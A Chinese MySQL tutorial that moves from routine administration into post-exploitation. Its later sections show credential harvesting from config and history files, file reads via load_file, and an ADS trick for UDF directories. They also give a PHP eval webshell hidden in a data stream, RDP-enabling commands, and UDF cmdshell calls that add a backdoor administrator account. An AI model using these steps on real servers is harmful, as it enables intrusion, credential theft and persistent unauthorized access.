4.1 MySQL获取webshell及提权基础

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: 4.1 MySQL获取webshell及提权基础

4.1 MySQL获取webshell及提权基础

4.1.1 MySQL连接

  1. 使用自身客户端工具进行连接

Windows环境

mysql.exe -h localhost -uroot -ppassword

或者

Linux环境

mysql -h localhost -uroot -ppassword

Tips:上面登录过程中密码最好不直接写,输入账户之后按下回车键再输入密码

  1. 使用客户端工具Navicat for MySQL进行连接

文件-新建连接 在新建连接得窗口输入连接名,主机名或IP地址,端口,用户名,密码 ,然后测试连接没有问题就可以正常连接

4.1.2 数据库密码操作

mysql 5.7.6以后的版本将原来的password字段修改为authentication_string ,其加密算法还是原来的加密算法,在安全上进行了极大的加强

  1. 低于5.7.6版本

mysql -h localhost -u root -p 敲击回车输入密码

use mysql;

update user set password=password("xxxeee") where user='root';

flush privileges; // 刷新数据库

  1. 高于5.7.6版本

update mysql.user set authentication_string=password('xxooee') where user='root' and Host='localhost';

select authentication_string from user;

flush privileges // 刷新数据库

  1. 查询密码值

select authentication_string from user;

4.1.3 数据库操作命令

  1. 数据库基本操作命令

(1) 显示所有数据库并查询当前使用的数据库

show databases;

select database();

(2) 创建数据库

create database name;

(3) 选择数据库

use databasename;

(4) 直接删除数据库,无提示

drop database name;

(5) 删除数据库前有提示

mysqladmin drop databasename

(6) mysqldump备份数据库

导出整个数据库

mysqldump -u 用户名 -p --default-character-set=latin1 数据库名 > 导出的文件名(数据库默认编码是latin1)

mysqldump -u root -p root mysql > mysqlbackup20200620.sql

注意:备份的名称最好写有意义的,方便日后识别后数据库出问题及时恢复

导出一个表

mysqldump -u 用户名 -p 数据库名表名 > 导出的文件名

mysqldump -u root -p root mysql users > mysql_users.sql

导出一个数据库结构

mysqldump -u root -p -d --add-drop-table bmfx_member > /tmp/bmfx_db.sql

-d 没有数据 --add-drop-table 在每个create语句之前增加一个drop table

(7) 恢复数据库

常使用source命令

use bmfx;

source bmfx_db.sql

使用mysqldump命令

mysqldump -u username -p dbname < filename.sql

使用mysql命令

mysql -u username -p -D dbname < filename.sql

  1. 操作表相关命令

(1) 使用mysql数据库

use mysql;

(2) 显示mysql库里面的所有表

show tables;

(3) 显示具体的表结构

describe mysql.user;

show columns from mysql.user;

desc mysql.user

(4) 创建表

create table mybmfx(

id int(4) not null primary key auto_increment,

name char(20) not null,

sex int(4) not null default '0',

degree double(18,2));

(5) 删除表

drop table <表名>;

删除表,执行后将直接删除该数据库中的表,执行该命令一定要谨慎,MyISAM类型的表删除后无法恢复,Innodb表还有可能恢复

drop mybmfx;

(6) 插入数据

INSERT INTO insert_table (datetime, uid, content, type)

VALUES (‘1’, ‘userid_1’, ‘content_1’, 1);

https://www.runoob.com/mysql/mysql-insert-query.html

(7) 查询表中的数据

select * from tablename;

查询前几行的数据

select * from tablename order by id limit 0, n;

(8) 删除表中的数据

delete from tablename where expr = value; // 删除满足某一个条件的值

delete from bmfx; //删除表中的所有数据

(9) 修改表中的数据

update 表名 set 字段=新值, .... where 条件

(10) 在表中增加字段

alter table 表名 add字段类型其他:

(11) 更改表名

rename table 原表名 to 新表名

(12) 用文本方式将数据装入数据库表中(如: /opt/data/mysql.txt)

load data local infile "/opt/data/mysql.txt" into table mybmfx;

  1. 常用得内置函数

select system_user(); 查看系统用户

select current_user(); 查询当前用户

select user(); 查询用户

select version(); 查询数据库版本

select database(); 查询当前连接得数据库

select @@version_compile_os; 查询当前操作系统

select now(); 显示当前时间

4.1.4 MySQL提权必备条件

  1. 服务器安装MySQL数据库

利用MySQL提权的前提就是服务器安装了MySQL数据库,且MySQL的服务没有降权,MySQL数据库默认安装以系统权限继承的,并且需要获取MySQL的账号和密码

  1. 判断MySQL服务运行权限

(1) 通过查看系统账号,比如:net user 如果是mysql类的账号 ,则有可能降权了

(2) 通过查看mysqld运行的Priority值,如果mysqld的Priority值也为8那么mysql就是以system权限运行

(3) 查看端口是否可外联,一般情况下是不允许root账号外联的

4.1.5 MySQL密码获取与破解

  1. 获取网站数据库账号和密码

(1) 对于CMS系统,一定会有一个文件定义了数据库连接的用户和密码,查看各种默认配置文件;

(2) 对于Linux操作系统,除了上面的方法之外,还可以查看 /root/.mysql_history , /root/.bash_history

  1. 获取MySQL数据库user表

一般是在数据库的安装目录下,有个data目录,里面还哪有3个文件 user.frm, user.myd和user.myi, mysql数据库用户密码都是保存在user.myd文件中,包括其他用户的密码也在里面,在有权限的情况下将这3个文件导出到本地,通过本地的mysql环境读取user表中的数据,也可以通过文本编辑器将user.myd打开,将root账号密码丢到cmd5破解

  1. MySQL密码查询

通过以下查询语句直接查询MySQL数据库中的所有用户和密码

select user,password from mysql.user;

select user,password from mysql.user where user = 'root';

  1. MySQL密码加密算法

根据加密算法来识别账号密码

select password('123456'), concat('*', sha1(unhex(sha1('123456'))));

4.1.6 MySQL获取webshell

  1. 知道站点的物理路径

  2. 有足够大的权限

  3. magic_quotes_gpc()=off 不转义

  4. 高版本的MySQL新加的特性是限制文件写入,对于参数是 secure_file_priv

  5. 直接导出webshell或者创建表导出webshell

  6. Windows 2008环境下使用SQLTOOLS工具写webshell

参考:https://www.cnblogs.com/hackxf/p/8975501.html

4.1.7 MySQL渗透技巧总结

  1. 常见的有助于渗透到MySQL的函数

database(), user(), system_user(), session_user(), current_user(), load_file()

(1) 一些常见的系统配置文件如下:

https://www.jozxing.cc/archives/387

(2) 直接读取配置文件

select load_file('/etc/password')

select load_file('/etc/issues')

select load_file('/etc/rc.local')

select load_file('/usr/local/apache/conf/httpd.conf')

select load_file('/etc/nginx/nginx.conf')

(3) Linux下通过load_file 函数出来的数据库可能是hex编码,如果需要正常查看,就需要使用Notepad++将以上代码全部选中,然后选择插件"Converter

" --> "Hex-ASCII" 进行转换

  1. Windows下MySQL提权时无法创建目录解决办法及数据流隐藏webshell

NTFS中的ADS(交换数据流)可以建立目录,隐藏webshell等操作

(1) MySQL创建目录

MySQL 版本较高的情况下自定义函数的dll或者so文件要放在MySQL目录下的lib\plugin下面,一般普通的脚本是没有在这个文件夹下创建文件夹权限的,那么这里可以用ADS来突破:

select 'xxsswwoo' into oufile 'F:\mysql\lib::$INDEX_ALLOCATION';

此时会在MySQL目录下生成一个lib目录,这样就可以将UDF放在这个插件目录下了。

(2) 隐藏webshell

在服务器上echo一个数据流文件进去,如index.php 是网页正常文件,执行命令:

echo ^<?php @eval(request[xxssoo])? ^>> index.php;a.jpg

  1. 有用的一些技巧

(1) 3389端口命令行下获取总结

netstat -ano | findstr 3389 或者 netstat -ano | find "3389"

tasklit /svc | find "TermService" 查看TermService对应的pid号是3352

netstat -ano | find 3352

(2) Windows 2008 Server命令开启3389端口

wmic /namespace:\root\cimv2\terminalservices path

win32_terminalservicesetting where (__CLASS != “”) call

setallowtsconnections 1

wmic /namespace:\root\cimv2\terminalservices path

win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call

setuserauthenticationrequired 1

reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

参考:

https://www.zhihu.com/question/58674236/answer/161702330

https://www.jianshu.com/p/8e7d2f78f5e1

(3) wce64 -w 命令直接获取系统明文登录密码

(4) 在phpinfo中查找script_filename关键字获取真实路径

(5) Linux终端提示符下查看MySQL有关信息

ps -ef | grep mysql

(6) Linux下启动Mysql服务

/etc/init.d/mysqld start

(7) Linux下查看是mysqld是否启动

ps -ef | grep mysqld

(8) 查看mysql在哪里

whereis mysql

(9) 查看运行文件所在的路径

which mysql

(10) udf.dll提权常见函数

cmdshell : 执行cmd

downloader : 下载者

open3389 : 通用开3389程序

backshell : 反弹shell

ProcessView : 列举系统进程

KillProcess : 终止指定进程

regread : 读注册表

regwrite : 写注册表

shut : 关机,注销,重启

about: 说明与帮助函数

示例:

select cmdshell('net user bmfx bmfx1234!@#@ /add');

select cmdshell('net localgroup administrators bmfx /add');

select cmdshell('regedit /s d:/web3389.reg');

select cmdshell('netstat -ano');

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
SQL 存储 安全
MySQL提权总结(建议收藏)
MySQL提权总结(建议收藏)
327 0
|
6月前
|
关系型数据库 MySQL Shell
mysql数据库提权
UDF提权是攻击者利用MySQL的自定义函数(如sys_eval, sys_exec)创建dll文件,获取系统shell权限。需有MySQL的插入和删除权限及写入dll的权限。不同版本MySQL的dll存放位置不同,通常在lib/plugin目录。信息收集包括检查secure_file_priv、操作系统、版本、路径等。获取udf文件可通过sqlmap(需解码)或msf,然后上传到相应目录。注意利用NTFS数据流创建目录。
140 1
|
关系型数据库 MySQL 数据库
mysql 提权
UDF提权是利用MySQL的自定义函数功能,将MySQL账号转化为系统system权限 下载lib_mysqludf_sys程序 github:https://github.
1202 0
|
SQL 存储 关系型数据库
mysql udf提权
mysql udf提权 本次测试环境 win2008 R2 Enterprise phpstudy2018 运行的版本是:php-5.4.45 + apache mysql版本:
544 0
|
SQL 安全 关系型数据库
[WEB安全]MySQl提权 mof、udf过程详解(下)
[WEB安全]MySQl提权 mof、udf过程详解
419 0
[WEB安全]MySQl提权 mof、udf过程详解(下)
|
SQL 监控 安全
[WEB安全]MySQl提权 mof、udf过程详解(上)
[WEB安全]MySQl提权 mof、udf过程详解
394 0
[WEB安全]MySQl提权 mof、udf过程详解(上)
|
Ubuntu 关系型数据库 MySQL
mysql的提权
mysql的提权原理就是让mysql能够执行系统命令, 而对与mysql的提权主要分为两种:MOF提权和UDF提权 第一种: 参考文献: https://www.cnblogs.com/zhuyp1015/p/3561470.
1922 0
|
关系型数据库 MySQL Shell